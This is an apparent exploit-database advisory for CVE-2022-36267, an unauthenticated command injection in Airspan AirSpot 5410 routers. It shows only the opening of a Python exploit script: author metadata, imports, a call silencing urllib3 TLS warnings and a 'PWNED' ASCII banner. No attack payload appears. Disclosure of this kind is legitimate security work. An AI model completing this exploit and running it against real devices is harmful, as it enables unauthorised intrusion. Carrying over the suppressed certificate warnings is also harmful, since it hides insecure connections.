AirSpot 5410 versions 0.3.4.1-4 and below suffer from an unauthenticated remote command injection vulnerability.
advisories | CVE-2022-36267
# -*- coding: utf-8 -*-
# Exploit Title: AirSpot unauthenticated remote command injection
# Date: 7/26/2022
# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)
# Vendor Homepage: https://www.airspan.com/
# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf
# Version: 0.3.4.1-4 and under.
# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)
# CVE : CVE-2022-36267
from __future__ import print_function, unicode_literals
import argparse
import requests
import urllib3
# Silence urllib3's warnings for the whole process. Called with no argument,
# this ignores the library's HTTPWarning family, which includes
# InsecureRequestWarning (emitted for HTTPS requests made without
# certificate verification).
# NOTE(review): presumably the requests made later in this script skip TLS
# verification -- not visible in this part of the file; confirm. With this
# call in place an unverified connection produces no notice, so do not carry
# it over into tooling where the peer's identity matters.
urllib3.disable_warnings()
def banner():
airspanLogo = """
,-.
/ `. __..-,O
: --''_..-'.'
| . .-' `. '.
: . .`.'
`. / ..
`. ' .
`, `.
,|,`. `-.
'.|| ``-...__..-`
| | Airspan
|__| AirSpot 5410
/|| PWNED x_x
//||
// ||
__//__||____
'--------------'Necrum Security Labs